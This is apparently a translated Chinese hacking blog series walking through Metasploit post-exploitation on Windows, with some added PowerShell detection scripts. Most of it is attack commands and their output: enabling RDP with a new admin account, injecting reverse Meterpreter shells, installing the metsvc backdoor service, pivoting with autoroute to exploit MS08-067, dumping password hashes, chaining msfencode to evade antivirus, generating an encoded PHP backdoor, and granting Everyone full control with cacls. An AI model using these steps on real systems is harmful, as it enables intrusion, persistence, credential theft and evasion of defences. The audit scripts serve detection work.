[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt
[*] Post module execution completed
msf  post(enable_rdp) >

Let's see whether 3389 is open now:

msf  post(enable_rdp) > nc -v 5.5.5.3 3389
[*] exec: nc -v 5.5.5.3 3389

Connection to 5.5.5.3 3389 port [tcp/*] succeeded!

It's open. You can of course switch to a different port as well.
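From the defender's side, the module leaves a recognisable set of changes: RDP switched on, TermService set to Automatic, an inbound 3389 firewall exception, and a fresh local account that sits in both Remote Desktop Users and Administrators. The following audit script is an added example, not part of the original post or of the Metasploit module; it assumes PowerShell 5.1 or later on Windows 8/2012 or newer for the NetSecurity and LocalAccounts cmdlets, and an elevated prompt.

```powershell
# Added example, not from the original post: audit a Windows host for the
# artifacts the enable_rdp module leaves behind. Run from an elevated prompt.
# Assumes PowerShell 5.1+ on Windows 8/2012 or later for the NetSecurity and
# LocalAccounts cmdlets; the registry and service checks work on older hosts.

$findings = @()

# 1. Is RDP allowed? fDenyTSConnections = 0 means connections are accepted.
$tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$ts = Get-ItemProperty -Path $tsKey -Name fDenyTSConnections -ErrorAction SilentlyContinue
if ($ts -and $ts.fDenyTSConnections -eq 0) {
    $findings += 'RDP connections are enabled (fDenyTSConnections = 0)'
}

# 2. The module forces the Terminal Services service to start automatically.
$svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='TermService'"
if ($svc -and $svc.StartMode -eq 'Auto') {
    $findings += "TermService start mode is Auto (current state: $($svc.State))"
}

# 3. Enabled inbound allow rules for TCP 3389 (the module opens the port).
$inbound = Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow -ErrorAction SilentlyContinue
foreach ($rule in $inbound) {
    $ports = ($rule | Get-NetFirewallPortFilter).LocalPort
    if ($ports -contains '3389') {
        $findings += "Inbound allow rule for 3389: $($rule.DisplayName)"
    }
}

# 4. Accounts that are both Remote Desktop Users and Administrators,
#    which is exactly the combination the module gives its new user.
$rdpUsers = @(Get-LocalGroupMember -Group 'Remote Desktop Users' -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Name)
$admins   = @(Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Name)
foreach ($u in $rdpUsers) {
    if ($admins -contains $u) {
        $findings += "Account in both Remote Desktop Users and Administrators: $u"
    }
}

# 5. Local accounts created in the last 7 days (Security event 4720; the
#    first event property is TargetUserName). Needs read access to the Security log.
$filter = @{ LogName = 'Security'; Id = 4720; StartTime = (Get-Date).AddDays(-7) }
$created = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
foreach ($e in $created) {
    $findings += "Local account created $($e.TimeCreated): $($e.Properties[0].Value)"
}

if ($findings.Count -eq 0) { 'No enable_rdp-style artifacts found.' } else { $findings }
```

The cleanup resource file the module writes (see the loot path in the output above) is the attacker-side record of these same changes; the checks here let a host owner find them without it.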

Inject in Memory

This one is impressive: in-memory injection.

msf  post(enable_rdp) > use post/windows/manage/multi_meterpreter_inject
msf  post(multi_meterpreter_inject) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf  post(multi_meterpreter_inject) > set LPORT 5624
LPORT => 5624
msf  post(multi_meterpreter_inject) > exploit 

[*] Running module against DIS9TEAM-A1
[*] Starting connection handler at port 5624 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=5.5.5.1 LPORT=5624
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1168
[*] Injecting meterpreter into process ID 1168
[*] Allocated memory at address 0x00780000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1168
[*] Meterpreter session 6 opened (5.5.5.1:5624 -> 5.5.5.3:1064) at 2012-03-22 00:40:19 +0800
[*] Post module execution completed
msf  post(multi_meterpreter_inject) >

A shell was obtained successfully.

metsvc backdoor

It runs as a system service.
First, get the tool:

brk@Dis9Team:/tmp$ wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
--2012-03-22 00:54:49--  http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
正在解析主机 www.phreedom.org... 66.45.226.226
正在连接 www.phreedom.org|66.45.226.226|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度: 55871 (55K) [application/zip]
正在保存至: “metsvc-1.0.zip”

100%[======================================>] 55,871      46.2K/s   花时 1.2s  

2012-03-22 00:54:52 (46.2 KB/s) - 已保存 “metsvc-1.0.zip” [55871/55871])

brk@Dis9Team:/tmp$ unzip metsvc-1.0.zip
Archive:  metsvc-1.0.zip
   creating: metsvc-1.0/
  inflating: metsvc-1.0/ChangeLog.txt
  inflating: metsvc-1.0/metsvc-server.exe
  inflating: metsvc-1.0/metsvc.exe
  inflating: metsvc-1.0/README.txt
   creating: metsvc-1.0/src/
  inflating: metsvc-1.0/src/Makefile
  inflating: metsvc-1.0/src/metsvc-server.cpp
  inflating: metsvc-1.0/src/metsvc.cpp
  inflating: metsvc-1.0/src/metsvc.h
  inflating: metsvc-1.0/test.rb
brk@Dis9Team:/tmp$ cd metsvc-1.0/
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/met
metcli.exe         meterpreter.php    metsrv.x64.dll     metsvc-server.exe
meterpreter.jar    metsrv.dll         metsvc.exe
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/metsrv.dll .
brk@Dis9Team:/tmp/metsvc-1.0$ ls
ChangeLog.txt  metsvc.exe         README.txt  test.rb
metsrv.dll     metsvc-server.exe  src
brk@Dis9Team:/tmp/metsvc-1.0$

Then upload it:

meterpreter > upload /tmp/metsvc-1.0/metsvc.exe c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsvc.exe -> c:/windows/\metsvc.exe
meterpreter > upload /tmp/metsvc-1.0/metsvc-server.exe c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsvc-server.exe -> c:/windows/\metsvc-server.exe
meterpreter > upload /tmp/metsvc-1.0/metsrv.dll c:/windows/
[*] uploading  : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/
[*] uploaded   : /tmp/metsvc-1.0/metsrv.dll -> c:/windows/\metsrv.dll
meterpreter >

Install the service:

meterpreter > shell
Process 2632 created.
Channel 6 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

c:\windows>metsvc.exe install-service
metsvc.exe install-service
 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

c:\windows>

Then, you know the drill:

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  exploit(handler) > exploit 

[-] Exploit exception: Setting ExitOnSession to false requires running as a job (exploit -j)
[*] Started bind handler
[*] Meterpreter session 8 opened (5.5.5.1:33670 -> 5.5.5.3:31337) at 2012-03-22 01:02:03 +0800

meterpreter >
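Everything this persistence method needs is visible from the host: a service named metsvc, three files dropped straight into the Windows directory, a bind listener on TCP 31337, and a service-installation event in the System log. The script below is an added example, not part of the original post or of the metsvc package; it assumes the default names and port shown above and an elevated PowerShell 5.1+ prompt.

```powershell
# Added example, not from the original post: look for a metsvc-style
# persistence service. Assumes the defaults used above: service name
# 'metsvc', metsvc.exe / metsvc-server.exe / metsrv.dll dropped into the
# Windows directory, and a bind listener on TCP 31337. Run from an elevated prompt.

$findings = @()

# 1. Services whose name or image path mentions metsvc/metsrv.
$services = Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.Name -match 'metsvc' -or $_.PathName -match 'metsvc|metsrv' }
foreach ($s in $services) {
    $findings += "Service $($s.Name) [$($s.State)/$($s.StartMode)] image '$($s.PathName)' account $($s.StartName)"
}

# 2. The dropped binaries. Loose executables directly in %windir% (rather than
#    System32) deserve a look on their own.
foreach ($name in 'metsvc.exe', 'metsvc-server.exe', 'metsrv.dll') {
    $path = Join-Path $env:windir $name
    if (Test-Path -Path $path) {
        $item = Get-Item -Path $path
        $findings += "File $path present ($($item.Length) bytes, created $($item.CreationTime))"
    }
}

# 3. Anything listening on the default bind port, with the owning process.
$listeners = Get-NetTCPConnection -State Listen -LocalPort 31337 -ErrorAction SilentlyContinue
foreach ($l in $listeners) {
    $proc = Get-Process -Id $l.OwningProcess -ErrorAction SilentlyContinue
    $findings += "TCP 31337 is listening, PID $($l.OwningProcess) ($($proc.ProcessName))"
}

# 4. Service installation events: System log event 7045 records the service
#    name (property 0) and image path (property 1) of every new service.
$installs = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } -ErrorAction SilentlyContinue
foreach ($e in $installs) {
    $svcName = $e.Properties[0].Value
    $image   = $e.Properties[1].Value
    if ("$svcName $image" -match 'metsvc|metsrv') {
        $findings += "Service install event $($e.TimeCreated): $svcName -> $image"
    }
}

if ($findings.Count -eq 0) { 'No metsvc artifacts found.' } else { $findings }
```

Step 4 is the one that survives a rename of the service or binaries only if the installer kept a telling path; in a broader hunt, review every 7045 event whose image lives outside System32 or Program Files.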

Closing remarks

There is a lot more I'd like to cover, but there is no time to build the environments, so I'll stop here.

A worked example of pivoting with Metasploit

First, by whatever means and whatever method, get a shell, a SYSTEM-level shell, and establish a Meterpreter session.
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeManageVolumePrivilege

meterpreter > getsystem
…got system (via technique 1).

Then take a look at the local IP and so on.

meterpreter > ipconfig /all

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 65539
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:cd:69:e8
MTU          : 1500
IPv4 Address : 192.168.0.116
IPv4 Netmask : 255.255.255.0

Then get the local subnet layout.

meterpreter > run get_local_subnets
Local subnet: 192.168.0.0/255.255.255.0

OK, now we add the local gateway and IP address, creating a virtual route inside the session.

meterpreter > run autoroute -h
Get a list of local subnets based on the host’s routes
USAGE: run get_local_subnets

OPTIONS:

-D        Delete all routes (does not require a subnet)
-d        Delete the named route instead of adding it
-h        Help and usage
-n <opt>  Netmask (IPv4, for example, 255.255.255.0
-p        Print active routing table. All other options are ignored
-s <opt>  Subnet (IPv4, for example, 10.10.10.0)

No further explanation needed, everyone can read that. Let's add the IP address and subnet mask.

meterpreter > run autoroute -s 192.168.0.0/24
[*] Adding a route to 192.168.0.0/255.255.255.0…
[+] Added route to 192.168.0.0/255.255.255.0 via xxx.24y.x7.50
[*] Use the -p option to list all active routes

The route is added automatically; now check the result.

meterpreter > run autoroute -p

Active Routing Table
====================

Subnet             Netmask            Gateway
------             -------            -------
192.168.0.0        255.255.255.0      Session 1

Created successfully: the current session now acts as the virtual routing client. Background the current session.

meterpreter >
Background session 1? [y/N]

Scan the hosts on the target's network for SMB version information, to learn something about the machines exposing SMB.

msf  auxiliary(smb_version) > run

[*] Scanned 029 of 256 hosts (011% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] 192.168.0.101:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:AV-PC) (domain:AV-PC)
[*] 192.168.0.100:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:USERCHI-4JSMNL8) (domain:WORKGROUP)
[*] Scanned 103 of 256 hosts (040% complete)
[*] 192.168.0.116:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.127:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.128:445 is running Windows 2000 Service Pack 4 with MS05-010+ (language: Chinese – Traditional) (name:J86PG7C8XQQPZDD) (domain:雨薇在线)
[*] Scanned 128 of 256 hosts (050% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

Lucky break: there is a Windows 2000 Server box on the internal network. Let's try MS08-067; it should take it down without trouble.

msf  exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set LHOST 192.168.0.0
LHOST => 192.168.0.0
msf  exploit(ms08_067_netapi) > set LPORT 9988
LPORT => 9988
msf  exploit(ms08_067_netapi) > set RHOST 192.168.0.128
RHOST => 192.168.0.128
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on xx.xy.xxy.131:9988
[*] Automatically detecting the target…
[*] Fingerprint: Windows 2000 – Service Pack 4 with MS05-010+ – lang:Chinese – Traditional
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability…
[*] Sending stage (752128 bytes) to yyy.yxy.xyx.154
[*] Meterpreter session 2 opened (xx.xy.xxy.131:9988 -> yyy.yxy.xyx.154:33303) at Sat Mar 24 00:42:30 +0400 2012

meterpreter >

Lucky twice in a row, time to buy a lottery ticket. The exploit succeeded; now let's look at the IP.

meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1500
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 16777219
============
Name         : AMD PCNET Family Ethernet Adapter
Hardware MAC : 00:0c:29:5f:c6:cd
MTU          : 1500
IPv4 Address : 192.168.0.128
IPv4 Netmask : 255.255.255.0

Right, this is indeed an internal host behind our target machine; note that the IP differs from the one above.

Dump the hashes:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_J86PG7C8XQQPZDD:1001:f1e39dbd0be340d11146fdf88178ba65:be3c0db67905a8e99a381dd109586c17:::
IWAM_J86PG7C8XQQPZDD:1002:2cc6fe6448db8c5f60b62c4796bb3088:2ea4c2826f40da7d5e7d67f001aae9d0:::
TsInternetUser:1000:2d705216336fe3b01ff234d2818fa846:0d834ee5cfa4b88ac3978002e3acadec:::

Background it and take a look:

meterpreter >
Background session 2? [y/N]
msf  exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id  Type                   Information                            Connection
--  ----                   -----------                            ----------
1   meterpreter x86/win32  MILSEC\Administrator @ MILSEC          xx.xy.xxy.131:5546 -> xxx.24y.57.50:30310 (192.168.0.116)
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ J86PG7C8XQQPZDD  xx.xy.xxy.131:9988 -> xxx.24x.148.154:33303 (192.168.0.128)

msf  exploit(ms08_067_netapi) >
Two different internal IPs and two different external IPs, which proves these are two different machines exploited through the same pivot.

On Linux this needs to be run as root, otherwise autoroute will have problems. I'll cover Linux tomorrow. I hope this helps when you do internal network audits...

Metasploit privilege escalation | metasploit -> meterpreter: privilege escalation in one command, 3389 in one command, a sharp escalation tool

Attack

First, the Apache in my VM runs without system privileges.

Let's generate a backdoor:

root@Dis9Team:~$ sudo msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 x > /var/www/door.exe
[sudo] password for brk:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.1", "LPORT"=>"4444"}

Then upload it through the web shell to the server and run it, with Metasploit listening locally.

Look at the terminal: the shell came back.

You can use the powerful Meterpreter session to escalate privileges for you; it automatically runs local exploits from old to new, including the 360 one:

meterpreter > getuid
Server username: DIS9TEAM-5FA711\apache   ==> not SYSTEM privileges
meterpreter > getsystem                   ==> run one command
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM      ==> the legendary exploit
meterpreter >

If antivirus is installed, you can bypass it too:

msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=21 R | ./msfencode -e x86/call4_dword_xor -t raw -c 5 | ./msfencode -e x86/countdown -t raw -c 5 | ./msfencode -e x86/fnstenv_mov -t raw -c 5 | ./msfencode -e x86/jmp_call_additive -t raw -c 5 | ./msfencode -t exe -c 5 > /tmp/5x.exe

If you'd rather not have an EXE stick out, you can generate a script backdoor instead:

root@Dis9Team:/tmp/# msfpayload -l | grep php
    php/bind_perl                                    Listen for a connection and spawn a command shell via perl (persistent)
    php/bind_perl_ipv6                               Listen for a connection and spawn a command shell via perl (persistent) over IPv6
    php/bind_php                                     Listen for a connection and spawn a command shell via php
    php/bind_php_ipv6                                Listen for a connection and spawn a command shell via php (IPv6)
    php/download_exec                                Download an EXE from an HTTP URL and execute it
    php/exec                                         Execute a single system command
    php/meterpreter/bind_tcp                         Listen for a connection, Run a meterpreter server in PHP
    php/meterpreter/reverse_tcp                      Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP
    php/meterpreter_reverse_tcp                      Connect back to attacker and spawn a Meterpreter server (PHP)
    php/reverse_perl                                 Creates an interactive shell via perl
    php/reverse_php                                  Reverse PHP connect back shell with checks for disabled functions
    php/shell_findsock                               

msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->


Introduction to advanced Meterpreter features

Meterpreter is Metasploit's default shellcode for Windows systems.
In the past Meterpreter was just a stopgap during a Metasploit intrusion:
once the intrusion succeeded, you uploaded a remote-control tool as soon as possible.

But the new generation of Meterpreter has become exceptionally powerful.
I even feel that in many situations working from Meterpreter alone is enough.

Feature 1: quick privilege escalation
The getsystem command escalates privileges quickly.
It really doesn't get simpler than this:
one command and you have SYSTEM privileges.

Meterpreter tries several methods on its own to get you SYSTEM.

Feature 2: hashdump
Run this command: run post/windows/gather/hashdump
One command gets you the contents of the Windows SAM database,
that is, the encrypted user names and passwords.

Feature 3: open 3389 directly
getgui is a newly added Meterpreter command.
It lets you easily open 3389 remote administration on the target system.
It has two usages: run getgui -e (only enables remote administration)
run getgui -u hacker -p s3cr3t (enables remote administration and creates a new account named hacker with password s3cr3t)

Feature 4: network sniffing
Meterpreter has very powerful network sniffing capabilities.
It can sniff the network without installing any driver on the target system,
and it is smart enough to ignore its own traffic.

Feature 5: network relay
The biggest difficulty attackers run into on a LAN is usually getting through NAT.
Now with Meterpreter it's easy:
Meterpreter lets a machine you've already compromised act as a relay to attack other machines on the same LAN.

Feature 6: screenshots
Take a screenshot to see what is happening on the other machine.
This one is easy to understand.

The best Metasploit tutorial: http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training

Churrasco ("Brazilian barbecue") privilege escalation

Almost forgot this sharp little tool.

A must for privilege escalation! Good.

You must be able to run cmd commands, whether with the system's own cmd or one you uploaded yourself.

Upload Churrasco to some directory of the site, say wwwroot/admin/, and suppose its absolute path is d:/wwwroot/admin/a.exe.

Then run the cmd command:

d:/wwwroot/admin/a.exe "net user"

The rest, you know.

Churrasco software:

Churrasco comes with its C++ source code. Compile it yourself if you're interested.

Cacls privilege-escalation commands

Just got an sa account.

Restored xp_cmdshell, wrote a small web shell and connected, but the privileges were too low; couldn't read or write anything.

Took me a long while to remember this little trick. Haven't done security in ages, really rusty~~

Cacls command parameters:
cacls.exe c: /e /t /g everyone:F #make drive C: browsable by everyone
cacls.exe d: /e /t /g everyone:F #make drive D: browsable by everyone
cacls.exe e: /e /t /g everyone:F #make drive E: browsable by everyone
cacls.exe f: /e /t /g everyone:F #make drive F: browsable by everyone
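The commands above give Everyone full control of an entire drive, recursively, which is what makes a low-privileged web shell able to read and write anything afterwards. The script below is an added example, not from the original post, that audits drive roots and their top-level directories for exactly that grant; it assumes PowerShell 5.1 or later and an administrative prompt.

```powershell
# Added example, not from the original post: find drive roots and their
# top-level directories where Everyone has been granted Full Control,
# the state the cacls commands above produce. Run as an administrator.

# Resolve the well-known Everyone SID so the check does not depend on the display language.
$everyoneSid  = New-Object System.Security.Principal.SecurityIdentifier('S-1-1-0')
$everyoneName = $everyoneSid.Translate([System.Security.Principal.NTAccount]).Value
$fullControl  = [System.Security.AccessControl.FileSystemRights]::FullControl

function Get-EveryoneFullControlAce {
    param([string]$Path)
    $acl = Get-Acl -Path $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $null }
    foreach ($ace in $acl.Access) {
        # Generic rights (e.g. GENERIC_ALL) appear as raw numbers and are not
        # matched here; this targets the explicit FullControl set by cacls /g.
        if ($ace.AccessControlType -eq 'Allow' -and
            $ace.IdentityReference.Value -eq $everyoneName -and
            $ace.FileSystemRights.HasFlag($fullControl)) {
            return $ace
        }
    }
    return $null
}

$results = @()
$drives = Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Root -match '^[A-Za-z]:\\$' }
foreach ($drive in $drives) {
    $subdirs = Get-ChildItem -Path $drive.Root -Directory -Force -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty FullName
    foreach ($target in (@($drive.Root) + @($subdirs))) {
        $ace = Get-EveryoneFullControlAce -Path $target
        if ($ace) {
            $results += [pscustomobject]@{
                Path      = $target
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

if ($results.Count -eq 0) {
    'No Everyone:FullControl grants found on drive roots.'
} else {
    $results | Format-Table -AutoSize
}
```

A non-inherited hit on a drive root is the signature of `cacls <drive> /e /t /g everyone:F`; the explicit grant can be removed again with `icacls <drive> /remove:g Everyone /t`.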

CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user […]]
[/P user:perm […]] [/D user […]]
filename 显示 ACL。
/T 更改当前目录及其所有子目录中
指定文件的 ACL。
/E 编辑 ACL 而不替换。
/C 在出现拒绝访问错误时继续。
/G user:perm 赋予指定用户访问权限。
Perm 可以是: R 读取
W 写入
C 更改(写入)
F 完全控制
/R user 撤销指定用户的访问权限(仅在与 /E 一起使用时合法)。
/P user:perm 替换指定用户的访问权限。
Perm 可以是: N 无
R 读取
W 写入
C 更改(写入)
F 完全控制
/D user 拒绝指定用户的访问。
在命令中可以使用通配符指定多个文件。